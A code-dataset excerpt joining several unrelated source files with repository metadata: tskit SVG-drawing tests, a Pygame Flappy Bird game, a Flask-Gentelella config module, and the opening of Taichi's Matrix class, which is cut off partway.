labels = {0: "XXX"}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
def test_no_mutation_labels(self):
t = self.get_binary_tree()
labels = {}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
# Can't really test for much here if we don't understand the SVG
def test_one_mutation_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"fill:{colour}") == 1
def test_all_mutations_colour(self):
t = self.get_binary_tree()
colours = {
mut.id: f"rgb({mut.id}, {mut.id}, {mut.id})" for mut in t.mutations()
}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"fill:{colour}") == 1
def test_unplotted_mutation(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
assert svg.count("fill-opacity:0") == 1
def test_max_tree_height(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 0 1
4 0 2
5 0 3
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 5 2
0 1 5 3
1 2 4 2
1 2 4 3
0 2 3 0
0 2 3 1
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
svg1 = ts.at_index(0).draw()
svg2 = ts.at_index(1).draw()
# if not scaled to ts, the edge above node 0 is of a different length in both
# trees, because the root is at a different height. We expect a group like
# <path class="edge" d="M 0 0 V -46 H 22.5" /><text>0</text>
str_pos = svg1.find(">0<")
snippet1 = svg1[svg1.rfind("edge", 0, str_pos) : str_pos]
str_pos = svg2.find(">0<")
snippet2 = svg2[svg2.rfind("edge", 0, str_pos) : str_pos]
assert snippet1 != snippet2
svg1 = ts.at_index(0).draw(max_tree_height="ts")
svg2 = ts.at_index(1).draw(max_tree_height="ts")
# when scaled, node 3 should be at the *same* height in both trees, so the edge
# definition should be the same
self.verify_basic_svg(svg1)
self.verify_basic_svg(svg2)
str_pos = svg1.find(">0<")
snippet1 = svg1[svg1.rfind("edge", 0, str_pos) : str_pos]
str_pos = svg2.find(">0<")
snippet2 = svg2[svg2.rfind("edge", 0, str_pos) : str_pos]
assert snippet1 == snippet2
def test_draw_sized_tree(self):
tree = self.get_binary_tree()
svg = tree.draw_svg(size=(600, 400))
self.verify_basic_svg(svg, width=600, height=400)
def test_draw_simple_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg()
self.verify_basic_svg(svg, width=200 * ts.num_trees)
def test_draw_integer_breaks_ts(self):
# NB: msprime 1.0 will mean updating this to `simulate(... discrete_genome=True)
recomb_map = msprime.RecombinationMap.uniform_map(
length=1000, rate=0.005, num_loci=1000
)
ts = msprime.simulate(5, recombination_map=recomb_map, random_seed=1)
assert ts.num_trees > 2
svg = ts.draw_svg()
self.verify_basic_svg(svg, width=200 * ts.num_trees)
axis_pos = svg.find('class="axis"')
for b in ts.breakpoints():
assert b == round(b)
assert svg.find(f">{b:.0f}<", axis_pos) != -1
def test_draw_even_height_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg(max_tree_height="tree")
self.verify_basic_svg(svg, width=200 * ts.num_trees)
def test_draw_sized_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg(size=(600, 400))
self.verify_basic_svg(svg, width=600, height=400)
def test_tree_height_scale(self):
ts = msprime.simulate(4, random_seed=2)
svg = ts.draw_svg(tree_height_scale="time")
self.verify_basic_svg(svg)
svg = ts.draw_svg(tree_height_scale="log_time")
self.verify_basic_svg(svg)
svg = ts.draw_svg(tree_height_scale="rank")
self.verify_basic_svg(svg)
for bad_scale in [0, "", "NOT A SCALE"]:
with pytest.raises(ValueError):
ts.draw_svg(tree_height_scale=bad_scale)
def test_x_scale(self):
ts = msprime.simulate(4, random_seed=2)
svg = ts.draw_svg(x_scale="physical")
self.verify_basic_svg(svg)
svg = ts.draw_svg(x_scale="treewise")
self.verify_basic_svg(svg)
def test_bad_x_scale(self):
ts = msprime.simulate(4, random_seed=2)
for bad_x_scale in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
ts.draw_svg(x_scale=bad_x_scale)
def test_no_edges(self):
ts = msprime.simulate(10, random_seed=2)
tables = ts.dump_tables()
tables.edges.clear()
ts_no_edges = tables.tree_sequence()
svg = ts_no_edges.draw_svg() # This should just be a row of 10 circles
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 0
svg = ts_no_edges.draw_svg(force_root_branch=True)
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 10
# If there is a mutation, the root branches should be there too
ts = msprime.mutate(ts, rate=1, random_seed=1)
tables = ts.dump_tables()
tables.edges.clear()
ts_no_edges = tables.tree_sequence().simplify()
assert ts_no_edges.num_mutations > 0 # Should have some singletons
svg = ts_no_edges.draw_svg()
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 10
assert svg.count("rect") == ts_no_edges.num_mutations
def test_tree_root_branch(self):
# in the simple_ts, there are root mutations in the first tree but not the second
ts = self.get_simple_ts()
tree_with_root_mutations = ts.at_index(0)
root1 = tree_with_root_mutations.root
tree_without_root_mutations = ts.at_index(1)
root2 = tree_without_root_mutations.root
svg1 = tree_with_root_mutations.draw_svg()
svg2a = tree_without_root_mutations.draw_svg()
svg2b = tree_without_root_mutations.draw_svg(force_root_branch=True)
self.verify_basic_svg(svg1)
self.verify_basic_svg(svg2a)
self.verify_basic_svg(svg2b)
# Last <path> should be the root branch, if it exists
edge_str = '<path class="edge" d='
str_pos1 = svg1.rfind(edge_str, 0, svg1.find(f">{root1}<"))
str_pos2a = svg2a.rfind(edge_str, 0, svg2a.find(f">{root2}<"))
str_pos2b = svg2b.rfind(edge_str, 0, svg2b.find(f">{root2}<"))
snippet1 = svg1[str_pos1 + len(edge_str) : svg1.find(">", str_pos1)]
snippet2a = svg2a[str_pos2a + len(edge_str) : svg2a.find(">", str_pos2a)]
snippet2b = svg2b[str_pos2b + len(edge_str) : svg2b.find(">", str_pos2b)]
assert snippet1.startswith('"M 0 0')
assert snippet2a.startswith('"M 0 0')
assert snippet2b.startswith('"M 0 0')
assert "H 0" in snippet1
assert not ("H 0" in snippet2a) # No root branch
assert "H 0" in snippet2b
def test_known_svg_tree_no_mut(self):
tree = self.get_simple_ts().at_index(1)
svg = tree.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "tree.svg")
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
def test_known_svg_tree_root_mut(self):
tree = self.get_simple_ts().at_index(0) # Tree 0 has a few mutations above root
svg = tree.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "mut_tree.svg")
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
def test_known_svg_ts(self):
ts = self.get_simple_ts()
svg = ts.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "ts.svg")
self.verify_basic_svg(svg, width=200 * ts.num_trees)
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
class TestRounding:
    """Tests for the number-rounding helper used by the drawing module."""

    def test_rnd(self):
        """``drawing.rnd`` passes 0 and inf through unchanged and rounds
        other values to at most six significant digits."""
        # Identity cases: zero and infinity are returned as-is.
        assert 0 == drawing.rnd(0)
        assert math.inf == drawing.rnd(math.inf)
        # Values already within six significant digits are unchanged.
        assert 1 == drawing.rnd(1)
        assert 1.1 == drawing.rnd(1.1)
        # Longer values are rounded to six significant digits.
        assert 1.11111 == drawing.rnd(1.111111)
        assert 1111110 == drawing.rnd(1111111)
        assert 123.457 == drawing.rnd(123.4567)
        assert 123.456 == drawing.rnd(123.4564)
| 35.549844 | 89 | 0.469804 |
795476df996dd18d4b54f6eabe35efb1ef4fea5f | 15,974 | py | Python | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | 2 | 2021-08-24T06:49:05.000Z | 2021-08-25T03:01:40.000Z | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | null | null | null | flappy.py | NikhilSharma0409/Flappy-Bird-Using-Python | d3324084f85d9d8442779728f69636ab05170ee5 | [
"MIT"
] | null | null | null | from itertools import cycle
import random
import sys
import pygame
from pygame.locals import *
# Frame-rate cap for the main game loop (frames per second).
FPS = 40
# Window dimensions in pixels.
SCREENWIDTH = 288
SCREENHEIGHT = 512
PIPEGAPSIZE = 125 # gap between upper and lower part of pipe
# y coordinate of the top of the ground strip (base occupies the bottom 21%).
BASEY = SCREENHEIGHT * 0.79
# image, sound and hitmask dicts, filled in at startup by main()
IMAGES, SOUNDS, HITMASKS = {}, {}, {}
# list of all possible players (tuple of 3 positions of flap)
PLAYERS_LIST = (
    # red bird
    (
        'redbird-upflap.png',
        'redbird-midflap.png',
        'redbird-downflap.png',
    ),
    # blue bird
    (
        'bluebird-upflap.png',
        'bluebird-midflap.png',
        'bluebird-downflap.png',
    ),
    # yellow bird
    (
        'yellowbird-upflap.png',
        'yellowbird-midflap.png',
        'yellowbird-downflap.png',
    ),
)
# list of backgrounds
BACKGROUNDS_LIST = (
    'background-day.png',
    'background-night.png',
)
# list of pipes
PIPES_LIST = (
    'pipe-green.png',
    'pipe-red.png',
)
# Python 2 compatibility shim: on Python 3 ``xrange`` no longer exists,
# so alias it to ``range``.
try:
    xrange
except NameError:
    xrange = range
def main():
    """Initialise pygame, load every image and sound asset, then loop
    forever: welcome screen -> one round of the game -> game-over screen."""
    global SCREEN, FPSCLOCK
    pygame.init()
    FPSCLOCK = pygame.time.Clock()
    SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
    pygame.display.set_caption('Flappy_Bird_PyCoder15')
    # numbers sprites for score display
    IMAGES['numbers'] = (
        pygame.image.load('0.png').convert_alpha(),
        pygame.image.load('1.png').convert_alpha(),
        pygame.image.load('2.png').convert_alpha(),
        pygame.image.load('3.png').convert_alpha(),
        pygame.image.load('4.png').convert_alpha(),
        pygame.image.load('5.png').convert_alpha(),
        pygame.image.load('6.png').convert_alpha(),
        pygame.image.load('7.png').convert_alpha(),
        pygame.image.load('8.png').convert_alpha(),
        pygame.image.load('9.png').convert_alpha()
    )
    # game over sprite
    IMAGES['gameover'] = pygame.image.load('gameover.png').convert_alpha()
    # message sprite for welcome screen
    IMAGES['message'] = pygame.image.load('message.png').convert_alpha()
    # base (ground) sprite
    IMAGES['base'] = pygame.image.load('base.png').convert_alpha()
    # sounds
    # NOTE(review): 'win' is also a substring of 'darwin', so macOS takes
    # the .wav branch as well -- confirm that is intended.
    if 'win' in sys.platform:
        soundExt = '.wav'
    else:
        soundExt = '.ogg'
    SOUNDS['die'] = pygame.mixer.Sound('die' + soundExt)
    SOUNDS['hit'] = pygame.mixer.Sound('hit' + soundExt)
    SOUNDS['point'] = pygame.mixer.Sound('point' + soundExt)
    SOUNDS['swoosh'] = pygame.mixer.Sound('swoosh' + soundExt)
    SOUNDS['wing'] = pygame.mixer.Sound('wing' + soundExt)
    while True:
        # select random background sprites
        randBg = random.randint(0, len(BACKGROUNDS_LIST) - 1)
        IMAGES['background'] = pygame.image.load(BACKGROUNDS_LIST[randBg]).convert()
        # select random player sprites
        randPlayer = random.randint(0, len(PLAYERS_LIST) - 1)
        IMAGES['player'] = (
            pygame.image.load(PLAYERS_LIST[randPlayer][0]).convert_alpha(),
            pygame.image.load(PLAYERS_LIST[randPlayer][1]).convert_alpha(),
            pygame.image.load(PLAYERS_LIST[randPlayer][2]).convert_alpha(),
        )
        # select random pipe sprites (upper pipe is the same image flipped vertically)
        pipeindex = random.randint(0, len(PIPES_LIST) - 1)
        IMAGES['pipe'] = (
            pygame.transform.flip(
                pygame.image.load(PIPES_LIST[pipeindex]).convert_alpha(), False, True),
            pygame.image.load(PIPES_LIST[pipeindex]).convert_alpha(),
        )
        # hitmask for pipes (per-pixel alpha masks for collision)
        HITMASKS['pipe'] = (
            getHitmask(IMAGES['pipe'][0]),
            getHitmask(IMAGES['pipe'][1]),
        )
        # hitmask for player
        HITMASKS['player'] = (
            getHitmask(IMAGES['player'][0]),
            getHitmask(IMAGES['player'][1]),
            getHitmask(IMAGES['player'][2]),
        )
        movementInfo = showWelcomeAnimation()
        crashInfo = mainGame(movementInfo)
        showGameOverScreen(crashInfo)
def showWelcomeAnimation():
    """Show the welcome screen until the player flaps (SPACE/UP).

    Returns a dict with the bird's start y, the base scroll offset and the
    flap-animation generator, consumed by mainGame().
    """
    # index of player to blit on screen
    playerIndex = 0
    playerIndexGen = cycle([0, 1, 2, 1])
    # iterator used to change playerIndex after every 5th iteration
    loopIter = 0
    playerx = int(SCREENWIDTH * 0.2)
    playery = int((SCREENHEIGHT - IMAGES['player'][0].get_height()) / 2)
    messagex = int((SCREENWIDTH - IMAGES['message'].get_width()) / 2)
    messagey = int(SCREENHEIGHT * 0.12)
    basex = 0
    # amount by which base can maximum shift to left
    baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
    # player shm for up-down motion on welcome screen
    playerShmVals = {'val': 0, 'dir': 1}
    while True:
        for event in pygame.event.get():
            if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
                pygame.quit()
                sys.exit()
            if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
                # make first flap sound and return values for mainGame
                SOUNDS['wing'].play()
                return {
                    'playery': playery + playerShmVals['val'],
                    'basex': basex,
                    'playerIndexGen': playerIndexGen,
                }
        # adjust playery, playerIndex, basex
        if (loopIter + 1) % 5 == 0:
            playerIndex = next(playerIndexGen)
        loopIter = (loopIter + 1) % 30
        basex = -((-basex + 4) % baseShift)
        playerShm(playerShmVals)
        # draw sprites
        SCREEN.blit(IMAGES['background'], (0,0))
        SCREEN.blit(IMAGES['player'][playerIndex],
                    (playerx, playery + playerShmVals['val']))
        SCREEN.blit(IMAGES['message'], (messagex, messagey))
        SCREEN.blit(IMAGES['base'], (basex, BASEY))
        pygame.display.update()
        FPSCLOCK.tick(FPS)
def mainGame(movementInfo):
    """Run one round of the game.

    Returns a crash-info dict (position, pipes, score, velocity, rotation)
    for showGameOverScreen() once the bird hits a pipe or the ground.
    """
    score = playerIndex = loopIter = 0
    playerIndexGen = movementInfo['playerIndexGen']
    playerx, playery = int(SCREENWIDTH * 0.2), movementInfo['playery']
    basex = movementInfo['basex']
    baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
    # get 2 new pipes to add to upperPipes lowerPipes list
    newPipe1 = getRandomPipe()
    newPipe2 = getRandomPipe()
    # list of upper pipes
    upperPipes = [
        {'x': SCREENWIDTH + 200, 'y': newPipe1[0]['y']},
        {'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
    ]
    # list of lowerpipe
    lowerPipes = [
        {'x': SCREENWIDTH + 200, 'y': newPipe1[1]['y']},
        {'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
    ]
    pipeVelX = -4
    # player velocity, max velocity, downward accleration, accleration on flap
    playerVelY = -9 # player's velocity along Y, default same as playerFlapped
    playerMaxVelY = 10 # max vel along Y, max descend speed
    playerMinVelY = -8 # min vel along Y, max ascend speed (currently unused)
    playerAccY = 1 # players downward accleration
    playerRot = 45 # player's rotation
    playerVelRot = 3 # angular speed
    playerRotThr = 20 # rotation threshold
    playerFlapAcc = -9 # players speed on flapping
    playerFlapped = False # True when player flaps
    while True:
        for event in pygame.event.get():
            if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
                pygame.quit()
                sys.exit()
            if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
                # ignore flaps once the bird has flown far above the screen
                if playery > -2 * IMAGES['player'][0].get_height():
                    playerVelY = playerFlapAcc
                    playerFlapped = True
                    SOUNDS['wing'].play()
        # check for crash here
        crashTest = checkCrash({'x': playerx, 'y': playery, 'index': playerIndex},
                               upperPipes, lowerPipes)
        if crashTest[0]:
            return {
                'y': playery,
                'groundCrash': crashTest[1],
                'basex': basex,
                'upperPipes': upperPipes,
                'lowerPipes': lowerPipes,
                'score': score,
                'playerVelY': playerVelY,
                'playerRot': playerRot
            }
        # check for score: one point when the bird's midpoint passes a pipe's midpoint
        playerMidPos = playerx + IMAGES['player'][0].get_width() / 2
        for pipe in upperPipes:
            pipeMidPos = pipe['x'] + IMAGES['pipe'][0].get_width() / 2
            if pipeMidPos <= playerMidPos < pipeMidPos + 4:
                score += 1
                SOUNDS['point'].play()
        # playerIndex basex change
        if (loopIter + 1) % 3 == 0:
            playerIndex = next(playerIndexGen)
        loopIter = (loopIter + 1) % 30
        basex = -((-basex + 100) % baseShift)
        # rotate the player
        if playerRot > -90:
            playerRot -= playerVelRot
        # player's movement
        if playerVelY < playerMaxVelY and not playerFlapped:
            playerVelY += playerAccY
        if playerFlapped:
            playerFlapped = False
            # more rotation to cover the threshold (calculated in visible rotation)
            playerRot = 45
        playerHeight = IMAGES['player'][playerIndex].get_height()
        playery += min(playerVelY, BASEY - playery - playerHeight)
        # move pipes to left
        for uPipe, lPipe in zip(upperPipes, lowerPipes):
            uPipe['x'] += pipeVelX
            lPipe['x'] += pipeVelX
        # add new pipe when first pipe is about to touch left of screen
        if len(upperPipes) > 0 and 0 < upperPipes[0]['x'] < 5:
            newPipe = getRandomPipe()
            upperPipes.append(newPipe[0])
            lowerPipes.append(newPipe[1])
        # remove first pipe if its out of the screen
        if len(upperPipes) > 0 and upperPipes[0]['x'] < -IMAGES['pipe'][0].get_width():
            upperPipes.pop(0)
            lowerPipes.pop(0)
        # draw sprites
        SCREEN.blit(IMAGES['background'], (0,0))
        for uPipe, lPipe in zip(upperPipes, lowerPipes):
            SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
            SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
        SCREEN.blit(IMAGES['base'], (basex, BASEY))
        # print score so player overlaps the score
        showScore(score)
        # Player rotation has a threshold
        visibleRot = playerRotThr
        if playerRot <= playerRotThr:
            visibleRot = playerRot
        playerSurface = pygame.transform.rotate(IMAGES['player'][playerIndex], visibleRot)
        SCREEN.blit(playerSurface, (playerx, playery))
        pygame.display.update()
        FPSCLOCK.tick(FPS)
def showGameOverScreen(crashInfo):
    """Animate the player crashing down and show the game-over image.

    Returns when the player presses SPACE/UP after the bird has settled
    on the ground, so main() can start a new round.
    """
    score = crashInfo['score']
    playerx = SCREENWIDTH * 0.2
    playery = crashInfo['y']
    playerHeight = IMAGES['player'][0].get_height()
    playerVelY = crashInfo['playerVelY']
    playerAccY = 2
    playerRot = crashInfo['playerRot']
    playerVelRot = 7
    basex = crashInfo['basex']
    upperPipes, lowerPipes = crashInfo['upperPipes'], crashInfo['lowerPipes']
    # play hit and die sounds
    SOUNDS['hit'].play()
    if not crashInfo['groundCrash']:
        SOUNDS['die'].play()
    while True:
        for event in pygame.event.get():
            if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
                pygame.quit()
                sys.exit()
            if event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):
                # only allow a restart once the bird has reached the ground
                if playery + playerHeight >= BASEY - 1:
                    return
        # player y shift
        if playery + playerHeight < BASEY - 1:
            playery += min(playerVelY, BASEY - playery - playerHeight)
        # player velocity change
        if playerVelY < 15:
            playerVelY += playerAccY
        # rotate only when it's a pipe crash
        if not crashInfo['groundCrash']:
            if playerRot > -90:
                playerRot -= playerVelRot
        # draw sprites
        SCREEN.blit(IMAGES['background'], (0,0))
        for uPipe, lPipe in zip(upperPipes, lowerPipes):
            SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
            SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
        SCREEN.blit(IMAGES['base'], (basex, BASEY))
        showScore(score)
        playerSurface = pygame.transform.rotate(IMAGES['player'][1], playerRot)
        SCREEN.blit(playerSurface, (playerx,playery))
        SCREEN.blit(IMAGES['gameover'], (50, 180))
        # bug fix: present the frame *before* waiting on the clock -- the
        # original ticked first, showing each frame one tick late and
        # inconsistently with the other two game loops
        pygame.display.update()
        FPSCLOCK.tick(FPS)
def playerShm(shm):
    """Oscillate shm['val'] between -8 and 8, stepping by shm['dir'] (+/-1)."""
    # flip direction when either extreme is reached
    if shm['val'] in (8, -8):
        shm['dir'] = -shm['dir']
    # dir is always +1 or -1, so a single add reproduces the +1/-1 branches
    shm['val'] += shm['dir']
def getRandomPipe():
    """Create one upper/lower pipe pair just off the right edge of the screen."""
    # pick the top of the gap: a random offset inside the playable band,
    # shifted down by 20% of the ground height
    gap_top = int(BASEY * 0.2) + random.randrange(0, int(BASEY * 0.6 - PIPEGAPSIZE))
    pipe_height = IMAGES['pipe'][0].get_height()
    x = SCREENWIDTH + 10
    return [
        {'x': x, 'y': gap_top - pipe_height},   # upper pipe (hangs down to the gap)
        {'x': x, 'y': gap_top + PIPEGAPSIZE},   # lower pipe (starts below the gap)
    ]
def showScore(score):
    """Blit the score digits, centred horizontally near the top of the screen."""
    digit_images = [IMAGES['numbers'][int(ch)] for ch in str(score)]
    # centre the run of digit sprites
    x_offset = (SCREENWIDTH - sum(img.get_width() for img in digit_images)) / 2
    for img in digit_images:
        SCREEN.blit(img, (x_offset, SCREENHEIGHT * 0.1))
        x_offset += img.get_width()
def checkCrash(player, upperPipes, lowerPipes):
    """Return [crashed, groundCrash] for the given player dict.

    crashed is True when the bird hits the ground or any pipe;
    groundCrash is True only for the ground case. Mutates `player`
    by caching its sprite width/height under 'w' and 'h'.
    """
    pi = player['index']
    player['w'] = IMAGES['player'][0].get_width()
    player['h'] = IMAGES['player'][0].get_height()
    # if player crashes into ground
    if player['y'] + player['h'] >= BASEY - 1:
        return [True, True]
    else:
        playerRect = pygame.Rect(player['x'], player['y'],
                      player['w'], player['h'])
        pipeW = IMAGES['pipe'][0].get_width()
        pipeH = IMAGES['pipe'][0].get_height()
        for uPipe, lPipe in zip(upperPipes, lowerPipes):
            # upper and lower pipe rects
            uPipeRect = pygame.Rect(uPipe['x'], uPipe['y'], pipeW, pipeH)
            lPipeRect = pygame.Rect(lPipe['x'], lPipe['y'], pipeW, pipeH)
            # player and upper/lower pipe hitmasks (pixel-perfect test)
            pHitMask = HITMASKS['player'][pi]
            uHitmask = HITMASKS['pipe'][0]
            lHitmask = HITMASKS['pipe'][1]
            # if bird collided with upipe or lpipe
            uCollide = pixelCollision(playerRect, uPipeRect, pHitMask, uHitmask)
            lCollide = pixelCollision(playerRect, lPipeRect, pHitMask, lHitmask)
            if uCollide or lCollide:
                return [True, False]
    return [False, False]
def pixelCollision(rect1, rect2, hitmask1, hitmask2):
    """Pixel-perfect collision test.

    Returns True iff the two hitmasks are both opaque at some point inside
    the intersection of the two bounding rects, False otherwise.
    """
    overlap = rect1.clip(rect2)
    if overlap.width == 0 or overlap.height == 0:
        # bounding boxes do not even intersect
        return False
    # offsets of the overlap region inside each object's own hitmask
    ox1, oy1 = overlap.x - rect1.x, overlap.y - rect1.y
    ox2, oy2 = overlap.x - rect2.x, overlap.y - rect2.y
    # fix: use the built-in range instead of the module-level py2 `xrange`
    # shim so the function is self-contained on Python 3
    return any(
        hitmask1[ox1 + x][oy1 + y] and hitmask2[ox2 + x][oy2 + y]
        for x in range(overlap.width) for y in range(overlap.height))
def getHitmask(image):
    """Return a per-pixel boolean mask built from the image's alpha channel.

    mask[x][y] is True where the pixel at (x, y) is not fully transparent.
    """
    # get_at() returns (r, g, b, a); index 3 is the alpha component.
    # fix: use the built-in range instead of the module-level py2 `xrange`
    # shim so the function is self-contained on Python 3
    return [[bool(image.get_at((x, y))[3]) for y in range(image.get_height())]
            for x in range(image.get_width())]
if __name__ == '__main__':
main()
| 32.733607 | 90 | 0.582321 |
7954771e56a748db05a1e9b4e24e853058898f51 | 983 | py | Python | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | config.py | rougeo/flask-gentelella | b8d8c39fdb45472d68e69502155fb06cdb0d6c61 | [
"MIT"
] | null | null | null | from os import environ
class Config(object):
    """Base Flask configuration shared by every environment."""
    SECRET_KEY = 'key'  # NOTE(review): hard-coded secret; should come from the environment
    SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    # THEME SUPPORT
    # if set then url_for('static', filename='', theme='')
    # will add the theme name to the static URL:
    # /static/<DEFAULT_THEME>/filename
    # DEFAULT_THEME = "themes/dark"
    DEFAULT_THEME = None
class ProductionConfig(Config):
    """Production settings: debugging off, PostgreSQL backend."""
    DEBUG = False
    # PostgreSQL database
    # Connection parameters come from GENTELELLA_DATABASE_* environment
    # variables; the fallbacks below (host 'db') presumably match a
    # docker-compose service -- verify against the deployment setup.
    SQLALCHEMY_DATABASE_URI = 'postgresql://{}:{}@{}:{}/{}'.format(
        environ.get('GENTELELLA_DATABASE_USER', 'gentelella'),
        environ.get('GENTELELLA_DATABASE_PASSWORD', 'gentelella'),
        environ.get('GENTELELLA_DATABASE_HOST', 'db'),
        environ.get('GENTELELLA_DATABASE_PORT', 5432),
        environ.get('GENTELELLA_DATABASE_NAME', 'gentelella')
    )
class DebugConfig(Config):
    """Development settings: debug on; inherits the SQLite URI from Config."""
    DEBUG = True
# Maps a mode name to its configuration class; presumably selected by
# name at app-creation time -- verify against the caller.
config_dict = {
    'Production': ProductionConfig,
    'Debug': DebugConfig
}
| 25.868421 | 67 | 0.669379 |
795478c4a9a2fbd2f6ce3883119af5d0c804f58d | 34,782 | py | Python | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | python/taichi/lang/matrix.py | arisliang/taichi | c775649705195a84e17a04432b60e796f31dee5c | [
"MIT"
] | null | null | null | import copy
import numbers
from collections.abc import Iterable
import numpy as np
from taichi.lang import expr, impl
from taichi.lang import ops as ops_mod
from taichi.lang import kernel_impl as kern_mod
from taichi.lang.common_ops import TaichiOperations
from taichi.lang.exception import TaichiSyntaxError
from taichi.lang.util import (in_python_scope, is_taichi_class, python_scope,
taichi_scope, to_numpy_type, to_pytorch_type)
from taichi.misc.util import deprecated, warning
class Matrix(TaichiOperations):
is_taichi_class = True
# TODO(archibate): move the last two line to **kwargs,
# since they're not commonly used as positional args.
def __init__(self,
n=1,
m=1,
dt=None,
shape=None,
offset=None,
empty=False,
layout=None,
needs_grad=False,
keep_raw=False,
rows=None,
cols=None):
self.grad = None
# construct from rows or cols (deprecated)
if rows is not None or cols is not None:
warning(
f"ti.Matrix(rows=[...]) or ti.Matrix(cols=[...]) is deprecated, use ti.Matrix.rows([...]) or ti.Matrix.cols([...]) instead.",
DeprecationWarning,
stacklevel=2)
if rows is not None and cols is not None:
raise Exception("cannot specify both rows and columns")
self.dt = dt
mat = Matrix.cols(cols) if cols is not None else Matrix.rows(rows)
self.n = mat.n
self.m = mat.m
self.entries = mat.entries
return
elif empty == True:
warning(
f"ti.Matrix(n, m, empty=True) is deprecated, use ti.Matrix.empty(n, m) instead",
DeprecationWarning,
stacklevel=2)
self.dt = dt
self.entries = [[None] * m for _ in range(n)]
return
elif isinstance(n, (list, tuple, np.ndarray)):
if len(n) == 0:
mat = []
elif isinstance(n[0], Matrix):
raise Exception(
'cols/rows required when using list of vectors')
elif not isinstance(n[0], Iterable):
if impl.inside_kernel():
# wrap potential constants with Expr
if keep_raw:
mat = [list([x]) for x in n]
else:
mat = [list([expr.Expr(x)]) for x in n]
else:
mat = [[x] for x in n]
else:
mat = [list(r) for r in n]
self.n = len(mat)
if len(mat) > 0:
self.m = len(mat[0])
else:
self.m = 1
self.entries = [x for row in mat for x in row]
else:
if dt is None:
# create a local matrix with specific (n, m)
self.entries = [impl.expr_init(None) for i in range(n * m)]
self.n = n
self.m = m
else:
# construct global matrix (deprecated)
warning(
"Declaring global matrices using `ti.Matrix(n, m, dt, shape)` is deprecated, "
"use `ti.Matrix.field(n, m, dtype, shape)` instead",
DeprecationWarning,
stacklevel=2)
mat = Matrix.field(n=n,
m=m,
dtype=dt,
shape=shape,
offset=offset,
needs_grad=needs_grad,
layout=layout)
self.n = mat.n
self.m = mat.m
self.entries = mat.entries
self.grad = mat.grad
if self.n * self.m > 32:
warning(
f'Taichi matrices/vectors with {self.n}x{self.m} > 32 entries are not suggested.'
' Matrices/vectors will be automatically unrolled at compile-time for performance.'
' So the compilation time could be extremely long if the matrix size is too big.'
' You may use a field to store a large matrix like this, e.g.:\n'
